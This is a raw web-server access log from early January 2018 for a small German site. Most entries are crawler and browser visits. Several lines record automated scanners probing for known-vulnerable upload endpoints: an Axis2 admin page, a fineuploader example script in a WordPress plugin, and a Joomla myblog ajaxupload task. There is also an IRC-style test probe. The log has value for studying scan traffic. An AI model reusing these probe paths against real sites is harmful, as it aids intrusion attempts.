139.162.119.197 - - [03/Jan/2018:13:27:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
139.162.108.53 - - [03/Jan/2018:13:38:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
139.162.108.53 - - [03/Jan/2018:13:41:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:14:05:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:14:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
172.104.108.109 - - [03/Jan/2018:14:16:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
139.162.114.70 - - [03/Jan/2018:14:21:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
222.186.34.33 - - [03/Jan/2018:14:41:47 +0100] "GET /axis2-web/index.jsp HTTP/1.1" 404 324 "-" "python-requests/2.7.0 CPython/2.7.9 Windows/2003Server"
5.188.87.7 - - [03/Jan/2018:14:45:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:14:46:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:14:47:09 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:14:47:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
164.132.91.1 - - [03/Jan/2018:15:00:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0"
141.212.122.144 - - [03/Jan/2018:15:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
158.69.54.207 - - [03/Jan/2018:15:43:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.54.207 - - [03/Jan/2018:15:43:28 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.54.207 - - [03/Jan/2018:15:43:29 +0100] "GET /sitemap.xml HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.54.207 - - [03/Jan/2018:15:43:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.54.207 - - [03/Jan/2018:15:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
5.188.87.7 - - [03/Jan/2018:15:46:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:15:46:49 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
141.212.122.144 - - [03/Jan/2018:15:51:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.249.79.1 - - [03/Jan/2018:15:56:20 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.7 - - [03/Jan/2018:15:56:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
139.162.108.53 - - [03/Jan/2018:16:11:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
204.79.180.1 - - [03/Jan/2018:16:41:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)"
5.188.87.7 - - [03/Jan/2018:17:10:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:17:11:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:17:11:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
5.188.87.7 - - [03/Jan/2018:17:11:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
54.162.0.29 - - [03/Jan/2018:17:35:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3096.62 Safari/537.32"
54.159.8.200 - - [03/Jan/2018:17:39:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3006.100 Safari/537.32"
23.98.222.172 - - [03/Jan/2018:17:44:16 +0100] ";pQ" 501 318 "-" "-"
139.162.114.70 - - [03/Jan/2018:18:04:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
144.76.223.13 - - [03/Jan/2018:18:22:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
139.162.114.70 - - [03/Jan/2018:18:55:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
216.244.65.59 - - [03/Jan/2018:19:03:16 +0100] "GET /wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php HTTP/1.1" 404 404 "http://www.hotelkleidung.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
144.217.66.151 - - [03/Jan/2018:19:09:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
144.217.66.151 - - [03/Jan/2018:19:09:52 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
144.217.66.151 - - [03/Jan/2018:19:09:53 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
144.217.66.151 - - [03/Jan/2018:19:09:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
144.217.66.151 - - [03/Jan/2018:19:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
60.191.38.78 - - [03/Jan/2018:19:12:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
222.186.34.33 - - [03/Jan/2018:19:13:54 +0100] "GET /axis2-web/index.jsp HTTP/1.1" 404 324 "-" "python-requests/2.7.0 CPython/2.7.9 Windows/2003Server"
207.244.157.139 - - [03/Jan/2018:19:42:10 +0100] "GET /index.php?option=com_myblog&task=ajaxupload HTTP/1.1" 404 322 "http://www.hotelkleidung.com/index.php?option=com_myblog&task=ajaxupload" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
87.166.41.254 - - [03/Jan/2018:20:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 7.0; HUAWEI CAN-L11 Build/HUAWEICAN-L11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36"
87.166.41.254 - - [03/Jan/2018:20:16:27 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "http://www.friedrich-list-berlin.de/" "Mozilla/5.0 (Linux; Android 7.0; HUAWEI CAN-L11 Build/HUAWEICAN-L11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36"
172.104.108.109 - - [03/Jan/2018:20:24:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
98.143.148.135 - - [03/Jan/2018:20:27:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
5.188.211.22 - - [03/Jan/2018:20:35:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.75.76.162 - - [03/Jan/2018:21:04:26 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.76.162 - - [03/Jan/2018:21:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
172.104.108.109 - - [03/Jan/2018:21:14:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
81.233.128.19 - - [03/Jan/2018:21:40:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
158.85.81.123 - - [03/Jan/2018:22:00:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
95.91.244.84 - - [03/Jan/2018:22:01:43 +0100] "GET / HTTP/1.1" 200 1229 "http://www.oberstufenzentrum.de/schulen/friedrich-list-schule" "Mozilla/5.0 (iPad; CPU OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1"
141.212.122.144 - - [03/Jan/2018:22:06:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
98.143.148.135 - - [03/Jan/2018:22:52:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
54.86.211.159 - - [03/Jan/2018:23:14:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/60.0.3082.103 Safari/537.32"
164.132.91.1 - - [03/Jan/2018:23:47:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "(KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
139.162.114.70 - - [04/Jan/2018:00:28:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
159.89.180.200 - - [04/Jan/2018:00:37:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
13.56.229.65 - - [04/Jan/2018:00:52:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
157.55.39.50 - - [04/Jan/2018:00:53:13 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.152 - - [04/Jan/2018:00:53:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
159.89.180.21 - - [04/Jan/2018:00:55:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
82.130.164.188 - - [04/Jan/2018:01:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
66.249.69.129 - - [04/Jan/2018:01:23:32 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.131 - - [04/Jan/2018:01:23:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.212.122.144 - - [04/Jan/2018:01:30:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
139.162.119.197 - - [04/Jan/2018:01:41:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
94.102.49.193 - - [04/Jan/2018:01:46:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [04/Jan/2018:01:46:47 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
94.102.49.193 - - [04/Jan/2018:01:46:53 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
94.102.49.193 - - [04/Jan/2018:01:47:03 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.10.0"
168.1.128.53 - - [04/Jan/2018:02:21:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
159.203.196.79 - - [04/Jan/2018:02:21:54 +0100] "GET / HTTP/1.0" 200 1229 "212.91.246.81" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
172.104.108.109 - - [04/Jan/2018:02:28:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
66.249.69.84 - - [04/Jan/2018:03:29:37 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.84 - - [04/Jan/2018:03:29:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.104.108.109 - - [04/Jan/2018:03:41:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
159.89.184.255 - - [04/Jan/2018:04:04:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
136.243.89.157 - - [04/Jan/2018:04:09:47 +0100] "GET /robots.txt HTTP/1.0" 404 330 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
136.243.89.157 - - [04/Jan/2018:04:09:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
158.85.81.115 - - [04/Jan/2018:04:25:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
172.104.108.109 - - [04/Jan/2018:04:32:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
208.110.66.130 - - [04/Jan/2018:04:32:16 +0100] "GET /wp-content/plugins/form-lightbox/readme.txt HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
98.143.148.135 - - [04/Jan/2018:05:14:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
60.191.38.78 - - [04/Jan/2018:05:50:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
207.46.13.161 - - [04/Jan/2018:05:59:08 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
60.191.38.78 - - [04/Jan/2018:06:13:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
104.131.173.180 - - [04/Jan/2018:07:21:00 +0100] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
188.138.33.91 - - [04/Jan/2018:07:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.33.91 - - [04/Jan/2018:07:31:31 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.33.91 - - [04/Jan/2018:07:31:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.33.91 - - [04/Jan/2018:07:31:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
164.132.91.1 - - [04/Jan/2018:07:56:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Galaxy/1.0 [en] (Mac OS X 10.5.6)"
196.52.43.53 - - [04/Jan/2018:08:19:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
172.104.108.109 - - [04/Jan/2018:08:20:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
194.153.113.101 - - [04/Jan/2018:09:02:58 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
194.153.113.101 - - [04/Jan/2018:09:02:58 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
194.153.113.101 - - [04/Jan/2018:09:02:58 +0100] "GET /core/common.js HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
98.143.148.135 - - [04/Jan/2018:09:11:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
134.94.229.234 - - [04/Jan/2018:09:14:54 +0100] "GET / HTTP/1.1" 200 1229 "http://www.oberstufenzentrum.de/schulen/friedrich-list-schule-ehemals-osz-buerowirtschaft-ii" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
134.94.229.234 - - [04/Jan/2018:09:14:54 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
13.56.229.65 - - [04/Jan/2018:09:16:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
52.90.237.144 - - [04/Jan/2018:09:25:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3102.93 Safari/537.32"
46.229.164.98 - - [04/Jan/2018:09:34:31 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)"
194.153.113.13 - - [04/Jan/2018:09:39:53 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
194.153.113.13 - - [04/Jan/2018:09:39:53 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
194.153.113.13 - - [04/Jan/2018:09:39:53 +0100] "GET /scripte/time.js HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
167.114.136.29 - - [04/Jan/2018:10:01:42 +0100] "GET / HTTP/1.1" 200 1229 "http://www.friedrich-list-berlin.de/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36"
13.56.229.65 - - [04/Jan/2018:10:17:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
206.253.224.75 - - [04/Jan/2018:10:33:26 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
206.253.224.75 - - [04/Jan/2018:10:33:26 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
206.253.224.75 - - [04/Jan/2018:10:33:26 +0100] "GET /scripte/all_scripts.js HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
172.104.108.109 - - [04/Jan/2018:10:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
139.162.119.197 - - [04/Jan/2018:12:01:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
159.89.46.241 - - [04/Jan/2018:12:07:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
185.35.63.78 - - [04/Jan/2018:13:03:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "gt"
185.35.63.60 - - [04/Jan/2018:13:05:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "av"
185.25.249.77 - - [04/Jan/2018:13:12:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.35.63.60 - - [04/Jan/2018:13:18:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "bm"
92.92.73.80 - - [04/Jan/2018:13:21:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.92.73.80 - - [04/Jan/2018:13:22:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.35.63.81 - - [04/Jan/2018:13:22:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "fz"
92.92.73.80 - - [04/Jan/2018:13:25:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.92.73.80 - - [04/Jan/2018:13:26:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.92.73.80 - - [04/Jan/2018:13:28:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.35.63.7 - - [04/Jan/2018:13:35:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "aw"
185.35.63.82 - - [04/Jan/2018:13:36:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "bk"
92.92.73.80 - - [04/Jan/2018:13:38:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.35.63.78 - - [04/Jan/2018:13:39:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "kk"
92.92.73.80 - - [04/Jan/2018:13:39:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.35.63.6 - - [04/Jan/2018:13:43:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "jt"
185.35.63.61 - - [04/Jan/2018:13:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "un"
66.249.69.159 - - [04/Jan/2018:13:47:27 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.158 - - [04/Jan/2018:13:47:27 +0100] "GET /corporate-fashion/ HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.35.63.81 - - [04/Jan/2018:13:52:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "ck"
164.52.24.140 - - [04/Jan/2018:13:55:26 +0100] "\x16\x03\x01\x01\"\x01" 501 326 "-" "-"
164.52.24.140 - - [04/Jan/2018:13:55:33 +0100] "USER test +iw test :Test Wuz Here" 400 329 "-" "-"
164.52.24.140 - - [04/Jan/2018:13:55:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
172.104.108.109 - - [04/Jan/2018:14:01:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
204.79.180.15 - - [04/Jan/2018:15:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)"
195.226.111.194 - - [04/Jan/2018:15:27:53 +0100] "GET / HTTP/1.1" 200 1229 "http://www.oberstufenzentrum.de/schulen/friedrich-list-schule-ehemals-osz-buerowirtschaft-ii" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
